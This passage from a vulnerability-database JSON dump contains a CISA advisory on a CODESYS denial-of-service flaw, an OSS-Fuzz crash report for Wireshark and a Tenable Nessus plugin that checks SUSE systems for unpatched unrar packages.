condition.\n\n[CVE-2019-13542](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13542>) has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Critical Manufacturing\n * **COUNTRIES/AREAS DEPLOYED: **Worldwide\n * **COMPANY HEADQUARTERS LOCATION:** Germany\n\n### 3.4 RESEARCHER\n\n3S-Smart Software Solutions GmbH reported this vulnerability to CISA.\n\n## 4\\. MITIGATIONS\n\n3S-Smart Software Solutions GmbH has released Version 3.5.15.0 to resolve this vulnerability for all affected CODESYS products.\n\nPlease visit the CODESYS update page for more information on how to obtain the software update: [https://www.codesys.com/download/ ](<https://www.codesys.com/download/>)\n\nAs part of a security strategy, 3S-Smart Software Solutions GmbH recommends the following general defense measures to reduce the risk of exploits: \n\n * Use controllers and devices only in a protected environment to minimize network exposure and ensure that they are not accessible from outside.\n * Use firewalls to protect and separate the control system network from other networks.\n * Use VPN (virtual private networks) tunnels if remote access is required.\n * Activate and apply user management and password features.\n * Limit the access to both development and control system by physical means, operating system features, etc.\n * Protect both development and control system by using up to date virus detecting solutions. For more information and general recommendations for protecting machines and plants, see also the CODESYS security whitepaper at <https://customers.codesys.com/fileadmin/data/customers/security/CODESYS-Security-Whitepaper.pdf>\n\nFor more information, 3S-Smart Software Solutions GmbH has released a security report that can be viewed at the following link: \n<https://www.codesys.com/fileadmin/data/customers/security/2019/Advisory2019-07_CDS-65080.pdf>\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nCISA also provides a section for [control systems security recommended practices](<https://www.us-cert.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.gov](<https://www.us-cert.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.gov](<https://www.us-cert.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B>). \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target this vulnerability.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/icsa-19-255-04>); we'd welcome your feedback.\n", "published": "2019-09-12T00:00:00", "modified": "2019-09-12T00:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://www.us-cert.gov/ics/advisories/icsa-19-255-04", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://twitter.com/share?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsa-19-255-04", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsa-19-255-04", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsa-19-255-04", "https://cwe.mitre.org/data/definitions/476.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13542", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "https://www.codesys.com/download/", "https://customers.codesys.com/fileadmin/data/customers/security/CODESYS-Security-Whitepaper.pdf", "https://www.codesys.com/fileadmin/data/customers/security/2019/Advisory2019-07_CDS-65080.pdf", "https://www.us-cert.gov/ics/recommended-practices", "https://www.us-cert.gov/ics", "https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf", "https://www.us-cert.gov/ics", "https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B", "https://www.dhs.gov/privacy-policy", "https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/icsa-19-255-04", "http://twitter.com/icscert", "https://www.dhs.gov", "https://www.dhs.gov/freedom-information-act-foia", "https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plain-writing-dhs", "https://www.dhs.gov/plug-information", "https://www.oig.dhs.gov/", "https://www.whitehouse.gov/", "https://www.usa.gov/", "https://www.dhs.gov/"], "cvelist": ["CVE-2019-13542"], "immutableFields": [], "lastseen": "2021-02-27T19:50:09", "history": [], "viewCount": 60, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-13542"]}, {"type": "ics", "idList": ["ICSA-20-084-01", "ICSA-21-096-01", "ICSA-17-089-01", "ICSA-19-192-01", "ICSA-14-275-01", "ICSA-19-155-02", "ICSA-19-087-01", "ICSA-16-061-01", "ICSA-20-343-05", "ICSMA-19-311-01", "ICSA-19-085-01", "ICSA-18-023-01", "ICSA-12-205-02", "ICSA-20-105-05", "ICSA-21-159-03", "ICSA-20-189-02", "ICSA-18-025-01", "ICSA-20-154-05", "ICSA-10-228-01", "ICSA-19-262-01", "ICSA-16-173-03", "ICSA-19-024-02", "ICSA-15-141-01A", "ICSA-15-342-02", "ICSA-17-010-01A", "ICSA2012601", "ICSA-313-01", "ICSA-18-198-03", "ICSA-14-303-02", "ICSA-18-107-02", "ICSA-13-231-01B", "ICSA-19-213-03", "ICSA-11-307-01", "ICSA-17-355-02", "ICSA-12-145-01", "ICSA-19-346-02", "ICSA-17-024-01", "ICSA-11-356-01", "ICSA-19-239-02", "ICSA-21-068-10", "ICSA-20-224-05", "ICSA-20-196-07", "ICSA-20-161-06", "ICSA-14-114-02", "ICSA-16-348-02", "ICSMA-19-120-01", "ICSA-18-100-01", "ICSA-20-301-01", "ICSA-18-338-02", "ICSA-18-198-01", "ICSA-15-062-02", "ICSMA-19-190-01", "ICSA-19-339-02", "ICSA-20-084-02", "ICSA2012602", "ICSA-14-079-01", "ICSA-20-336-01", "ICSA-17-115-03", "ICSA-21-159-09", "ICSA-20-042-05", "ICSA-21-068-03", "ICSA-11-168-01A", "ICSA-20-224-06", "ICSA-19-122-03", "ICSA-21-103-05", "ICSA-15-132-01", "ICSA-10-097-01", "ICSA-20-161-03", "ICSA-19-311-02", "ICSA-20-042-09", "ICSA-18-275-03", "ICSA-16-105-03", "ICSMA-17-229-01", "ICSA-18-025-02B", "ICSA-11-231-01", "ICSA-12-362-01", "ICSA-15-246-03", "ICSA-12-243-01", "ICSA-13-337-01", "ICSA-15-069-01", "ICSA-17-194-03", "ICSA-15-321-01", "ICSA-13-036-02", "ICSA-19-043-04", "ICSA-19-120-01", "ICSA-20-191-02", "ICSA-18-109-01", "ICSMA-18-137-01", "ICSA-15-034-02", "ICSA-16-154-01", "ICSA-21-166-02", "ICSA-19-064-01", "ICSA-15-300-01", "ICSA-18-305-01", "ICSA-17-243-02", "ICSA-20-051-02", "ICSA-13-091-01", "ICSA-21-147-05", "ICSA-13-084-01", "ICSA-20-245-01"]}], "modified": "2021-02-27T19:50:09", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-02-27T19:50:09", "rev": 2}}, "objectVersion": "1.5"}, "lastseen": "2021-02-27T19:50:09", "differentElements": ["cvss2", "cvss3"], "edition": 6}], "viewCount": 61, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-13542"]}, {"type": "ics", "idList": ["ICSA-19-190-05", "ICSMA-17-332-01", "ICSA-18-025-02B", "ICSA-18-184-01", "ICSA-12-131-02", "ICSMA-20-023-01", "ICSA-21-222-01", "ICSMA-20-079-01", "ICSA-17-054-03", "ICSA-20-196-06", "ICSA-21-068-02", "ICSA-14-345-01", "ICSA-13-136-01", "ICSA-20-140-01", "ICSA-19-290-02", "ICSA-14-073-01", "ICSA-13-067-01", "ICSA-14-343-02", "ICSA-14-254-02", "ICSA-19-050-04", "ICSA-313-01", "ICSA-21-103-03", "ICSA-20-273-03", "ICSA-12-032-01", "ICSA-17-024-01", "ICSA-19-225-02", "ICSA2012601", "ICSA-18-317-08", "ICSA-20-252-05", "ICSA-18-354-02", "ICSA-16-070-01", "ICSA-16-343-05", "ICSA-19-239-02", "ICSA-17-339-01", "ICSA-10-090-01", "ICSA-20-051-03", "ICSA-20-082-01", "ICSA-13-217-01", "ICSA-15-062-01", "ICSA-17-031-01A", "ICSA-21-194-02", "ICSA-19-164-02", "ICSA-17-033-01", "ICSA-12-342-01B", "ICSA-18-198-01", "ICSA-21-054-04", "ICSA-13-169-01", "ICSA-15-092-01", "ICSA2012602", "ICSA-19-094-02", "ICSA-21-124-02", "ICSA-20-287-06", "ICSMA-20-254-01", "ICSA-15-337-03", "ICSA-16-348-04", "ICSA-21-194-08", "ICSA-14-154-01", "ICSA-17-353-04", "ICSA-19-281-04", "ICSA-15-293-03", "ICSA-21-005-05", "ICSA-21-068-09", "ICSA-17-045-02", "ICSA-21-012-05", "ICSA-21-040-06", "ICSA-19-134-01", "ICSA-14-329-02D", "ICSA-14-105-01", "ICSA-16-021-01", "ICSA-12-025-02A", "ICSA-18-352-02", "ICSA-20-142-02", "ICSA-16-336-04", "ICSA-21-180-02", "ICSA-17-012-02", "ICSA-11-131-01", "ICSA-19-157-02", "ICSA-12-013-01", "ICSA-12-243-01", "ICSA-20-056-04", "ICSA-20-287-03", "ICSA-11-182-01", "ICSA-13-213-02", "ICSA-17-292-01", "ICSA-15-265-01", "ICSA-20-042-02", "ICSA-20-315-02", "ICSA-16-334-03", "ICSMA-21-084-01", "ICSA-18-025-01", "ICSA-17-012-03", "ICSMA-18-340-01", "ICSA-17-355-02", "ICSA-20-070-04", "ICSA-20-042-11", "ICSA-21-042-01", "ICSA-19-050-03", "ICSA-12-016-01", "ICSA-17-150-01", "ICSA-19-283-01"]}], "modified": "2021-07-28T18:29:26", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-07-28T18:29:26", "rev": 2}}, "objectVersion": "1.6", "_object_type": "robots.models.ics.ICSBulletin", "_object_types": ["robots.models.ics.ICSBulletin", "robots.models.base.Bulletin"]}], "ossfuzz": [{"id": "OSSFUZZ-13542", "hash": "829471aca8c6670fab29a7494faf68a0", "type": "ossfuzz", "bulletinFamily": "software", "title": "wireshark/fuzzshark_ip_proto-udp: Global-buffer-overflow in decode_tlv", "description": "Project:\nhttps://code.wireshark.org/review/wireshark\n\nDetailed report: https://oss-fuzz.com/testcase?key=5698027312906240\n\nProject: wireshark\nFuzzer: libFuzzer_wireshark_fuzzshark_ip_proto-udp\nFuzz target binary: fuzzshark_ip_proto-udp\nJob Type: libfuzzer_asan_wireshark\nPlatform Id: linux\n\nCrash Type: Global-buffer-overflow READ 4\nCrash Address: 0x00000a2c2dd2\nCrash State:\n decode_tlv\n dissect_noe\n call_dissector_work\n \nSanitizer: address (ASAN)\n\nRegressed: https://oss-fuzz.com/revisions?job=libfuzzer_asan_wireshark&range=201903040505:201903050525\n\nReproducer Testcase: https://oss-fuzz.com/download?testcase_id=5698027312906240\n\nIssue filed automatically.\n\nSee https://github.com/google/oss-fuzz/blob/master/docs/reproducing.md for instructions to reproduce this bug locally.\n\nThis bug is subject to a 90 day disclosure deadline. If 90 days elapse\nwithout an upstream patch, then the bug report will automatically\nbecome visible to the public.\n\nWhen you fix this bug, please\n * mention the fix revision(s).\n * state whether the bug was a short-lived regression or an old bug in any stable releases.\n * add any other useful information.\nThis information can help downstream consumers.\n\nIf you need to contact the OSS-Fuzz team with a question, concern, or any other feedback, please file an issue at https://github.com/google/oss-fuzz/issues.", "published": "2019-03-06T13:52:57", "modified": "2019-04-06T15:24:32", "cvss": {}, "href": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=13542", "reporter": "Google", "references": [], "cvelist": [], "lastseen": "2020-04-03T20:52:06", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [], "modified": "2020-04-03T20:52:06", "rev": 2}, "score": {"value": -0.7, "vector": "NONE", "modified": "2020-04-03T20:52:06", "rev": 2}}, "objectVersion": "1.4", "ossfuzz": {"issue": 13542, "status": "Verified", "project": "wireshark", "ref": "https://oss-fuzz.com/revisions?job=libfuzzer_asan_wireshark&range=201903050525:201903070516", "crashType": "Global-buffer-overflow READ 4", "revisions": ["daf29e2bde25f931908f4b17ee5866f90f84b3ce:3267f3641f2ca831496871ebfe3949932e31d5fa"], "project_repos": ["https://code.wireshark.org/review/wireshark"], "tags": ["3.3.0rc", "3.1.2rc", "3.1.1", "3.1.1rc", "3.1.0", "3.1.0rc", "2.9.1rc", "2.9.0", "2.9.0rc", "2.5.2rc", "2.5.1", "2.5.1rc", "2.5.0", "2.5.0rc", "2.3.0rc", "2.1.2rc", "2.1.1", "2.1.1rc", "2.1.0", "2.1.0rc", "1.99.10rc", "1.99.9", "1.99.9rc", "1.99.8", "1.99.8rc", "1.99.7", "1.99.7rc", "1.99.6", "1.99.6rc", "1.99.5", "1.99.5rc", "1.99.4", "1.99.4rc", "1.99.3", "1.99.3rc", "1.99.2", "1.99.2rc", "1.99.1", "1.99.1rc", "1.99.0", "1.99.0-rc1", "1.11.4-rc1", "1.11.3", "1.11.3-rc1", "1.11.2", "1.11.2-rc1", "1.11.1", "1.11.1-rc1", "1.11.0", "1.11.0-rc1", "0.3.15"]}, "affectedSoftware": [{"name": "wireshark", "version": "3.1.0rc", "operator": "eq"}, {"name": "wireshark", "version": "2.9.1rc", "operator": "eq"}, {"name": "wireshark", "version": "2.9.0", "operator": "eq"}, {"name": "wireshark", "version": "2.9.0rc", "operator": "eq"}, {"name": "wireshark", "version": "2.5.2rc", "operator": "eq"}, {"name": "wireshark", "version": "2.5.1", "operator": "eq"}, {"name": "wireshark", "version": "2.5.1rc", "operator": "eq"}, {"name": "wireshark", "version": "2.5.0", "operator": "eq"}, {"name": "wireshark", "version": "2.5.0rc", "operator": "eq"}, {"name": "wireshark", "version": "2.3.0rc", "operator": "eq"}, {"name": "wireshark", "version": "2.1.2rc", "operator": "eq"}, {"name": "wireshark", "version": "2.1.1", "operator": "eq"}, {"name": "wireshark", "version": "2.1.1rc", "operator": "eq"}, {"name": "wireshark", "version": "2.1.0", "operator": "eq"}, {"name": "wireshark", "version": "2.1.0rc", "operator": "eq"}, {"name": "wireshark", "version": "1.99.10rc", "operator": "eq"}, {"name": "wireshark", "version": "1.99.9", "operator": "eq"}, {"name": "wireshark", "version": "1.99.9rc", "operator": "eq"}, {"name": "wireshark", "version": "1.99.8", "operator": "eq"}, {"name": "wireshark", "version": "1.99.8rc", "operator": "eq"}, {"name": "wireshark", "version": "1.99.7", "operator": "eq"}, {"name": "wireshark", "version": "1.99.7rc", "operator": "eq"}, {"name": "wireshark", "version": "1.99.6", "operator": "eq"}, {"name": "wireshark", "version": "1.99.6rc", "operator": "eq"}, {"name": "wireshark", "version": "1.99.5", "operator": "eq"}, {"name": "wireshark", "version": "1.99.5rc", "operator": "eq"}, {"name": "wireshark", "version": "1.99.4", "operator": "eq"}, {"name": "wireshark", "version": "1.99.4rc", "operator": "eq"}, {"name": "wireshark", "version": "1.99.3", "operator": "eq"}, {"name": "wireshark", "version": "1.99.3rc", "operator": "eq"}, {"name": "wireshark", "version": "1.99.2", "operator": "eq"}, {"name": "wireshark", "version": "1.99.2rc", "operator": "eq"}, {"name": "wireshark", "version": "1.99.1", "operator": "eq"}, {"name": "wireshark", "version": "1.99.1rc", "operator": "eq"}, {"name": "wireshark", "version": "1.99.0", "operator": "eq"}, {"name": "wireshark", "version": "1.99.0-rc1", "operator": "eq"}, {"name": "wireshark", "version": "1.11.4-rc1", "operator": "eq"}, {"name": "wireshark", "version": "1.11.3", "operator": "eq"}, {"name": "wireshark", "version": "1.11.3-rc1", "operator": "eq"}, {"name": "wireshark", "version": "1.11.2", "operator": "eq"}, {"name": "wireshark", "version": "1.11.2-rc1", "operator": "eq"}, {"name": "wireshark", "version": "1.11.1", "operator": "eq"}, {"name": "wireshark", "version": "1.11.1-rc1", "operator": "eq"}, {"name": "wireshark", "version": "1.11.0", "operator": "eq"}, {"name": "wireshark", "version": "1.11.0-rc1", "operator": "eq"}, {"name": "wireshark", "version": "0.3.15", "operator": "eq"}], "_object_type": "robots.models.ossfuzz.OssFuzzBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.ossfuzz.OssFuzzBulletin"]}], "nessus": [{"id": "SUSE_SU-2018-0862-1.NASL", "hash": "ec931826db9d7c4771ca5efe0590808d", "type": "nessus", "bulletinFamily": "scanner", "title": "SUSE SLES11 Security Update : unrar (SUSE-SU-2018:0862-1)", "description": "This update for unrar to version 5.6.1 fixes several issues. These security issues were fixed :\n\n - CVE-2017-12938: Prevent remote attackers to bypass a directory-traversal protection mechanism via vectors involving a symlink to the . directory, a symlink to the .. directory, and a regular file (bsc#1054038).\n\n - CVE-2017-12940: Prevent out-of-bounds read in the EncodeFileName::Decode call within the Archive::ReadHeader15 function (bsc#1054038).\n\n - CVE-2017-12941: Prevent an out-of-bounds read in the Unpack::Unpack20 function (bsc#1054038).\n\n - CVE-2017-12942: Prevent a buffer overflow in the Unpack::LongLZ function (bsc#1054038).\n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2018-04-04T00:00:00", "modified": "2021-01-19T00:00:00", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/108828", "reporter": "This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=1046882", "http://www.nessus.org/u?183f5d82", "https://www.suse.com/security/cve/CVE-2017-12940/", "https://bugzilla.suse.com/show_bug.cgi?id=1054038", "https://www.suse.com/security/cve/CVE-2017-12938/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12938", "https://www.suse.com/security/cve/CVE-2017-12941/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12942", "https://bugzilla.suse.com/show_bug.cgi?id=513804", "https://bugzilla.suse.com/show_bug.cgi?id=693890", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12940", "https://www.suse.com/security/cve/CVE-2012-6706/", "https://www.suse.com/security/cve/CVE-2017-12942/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6706", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12941"], "cvelist": ["CVE-2012-6706", "CVE-2017-12938", "CVE-2017-12940", "CVE-2017-12941", "CVE-2017-12942"], "immutableFields": [], "lastseen": "2021-09-01T01:15:58", "history": [{"bulletin": {"id": "SUSE_SU-2018-0862-1.NASL", "hash": "06011797e3ed55dec72452f86a2a460acd5c484c0530b3a03abf2aa230125385", "type": "nessus", "bulletinFamily": "scanner", "title": "SUSE SLES11 Security Update : unrar (SUSE-SU-2018:0862-1)", "description": "This update for unrar to version 5.6.1 fixes several issues. These security issues were fixed :\n\n - CVE-2017-12938: Prevent remote attackers to bypass a directory-traversal protection mechanism via vectors involving a symlink to the . directory, a symlink to the .. directory, and a regular file (bsc#1054038).\n\n - CVE-2017-12940: Prevent out-of-bounds read in the EncodeFileName::Decode call within the Archive::ReadHeader15 function (bsc#1054038).\n\n - CVE-2017-12941: Prevent an out-of-bounds read in the Unpack::Unpack20 function (bsc#1054038).\n\n - CVE-2017-12942: Prevent a buffer overflow in the Unpack::LongLZ function (bsc#1054038).\n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2018-04-04T00:00:00", "modified": "2018-04-04T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=108828", "reporter": "Tenable", "references": ["https://www.suse.com/security/cve/CVE-2012-6706.html", "http://www.nessus.org/u?fc48d1bd", "https://www.suse.com/security/cve/CVE-2017-12941.html", "https://www.suse.com/security/cve/CVE-2017-12940.html", "https://bugzilla.suse.com/513804", "https://www.suse.com/security/cve/CVE-2017-12938.html", "https://bugzilla.suse.com/1046882", "https://bugzilla.suse.com/693890", "https://www.suse.com/security/cve/CVE-2017-12942.html", "https://bugzilla.suse.com/1054038"], "cvelist": ["CVE-2017-12938", "CVE-2017-12940", "CVE-2017-12941", "CVE-2017-12942", "CVE-2012-6706"], "immutableFields": [], "lastseen": "2018-04-06T11:23:20", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "108828", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:0862-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108828);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/04/04 18:33:42\");\n\n script_cve_id(\"CVE-2012-6706\", \"CVE-2017-12938\", \"CVE-2017-12940\", \"CVE-2017-12941\", \"CVE-2017-12942\");\n script_osvdb_id(87061, 163465, 163466, 163467, 163468);\n\n script_name(english:\"SUSE SLES11 Security Update : unrar (SUSE-SU-2018:0862-1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for unrar to version 5.6.1 fixes several issues. These\nsecurity issues were fixed :\n\n - CVE-2017-12938: Prevent remote attackers to bypass a\n directory-traversal protection mechanism via vectors\n involving a symlink to the . directory, a symlink to the\n .. directory, and a regular file (bsc#1054038).\n\n - CVE-2017-12940: Prevent out-of-bounds read in the\n EncodeFileName::Decode call within the\n Archive::ReadHeader15 function (bsc#1054038).\n\n - CVE-2017-12941: Prevent an out-of-bounds read in the\n Unpack::Unpack20 function (bsc#1054038).\n\n - CVE-2017-12942: Prevent a buffer overflow in the\n Unpack::LongLZ function (bsc#1054038).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1046882\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1054038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/513804\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/693890\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2012-6706.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12938.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12940.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12941.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12942.html\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20180862-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fc48d1bd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-unrar-13542=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-unrar-13542=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:unrar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! ereg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"unrar-5.6.1-5.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"unrar\");\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["p-cpe:/a:novell:suse_linux:unrar", "cpe:/o:novell:suse_linux:11"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2018-04-06T11:23:20", "differentElements": ["modified", "references", "sourceData"], "edition": 1}, {"bulletin": {"id": "SUSE_SU-2018-0862-1.NASL", "hash": "24bea1182605dacd6c8f59bbb72ab3fbc6f72d3e28afcab8017ba093b155fff8", "type": "nessus", "bulletinFamily": "scanner", "title": "SUSE SLES11 Security Update : unrar (SUSE-SU-2018:0862-1)", "description": "This update for unrar to version 5.6.1 fixes several issues. These security issues were fixed :\n\n - CVE-2017-12938: Prevent remote attackers to bypass a directory-traversal protection mechanism via vectors involving a symlink to the . directory, a symlink to the .. directory, and a regular file (bsc#1054038).\n\n - CVE-2017-12940: Prevent out-of-bounds read in the EncodeFileName::Decode call within the Archive::ReadHeader15 function (bsc#1054038).\n\n - CVE-2017-12941: Prevent an out-of-bounds read in the Unpack::Unpack20 function (bsc#1054038).\n\n - CVE-2017-12942: Prevent a buffer overflow in the 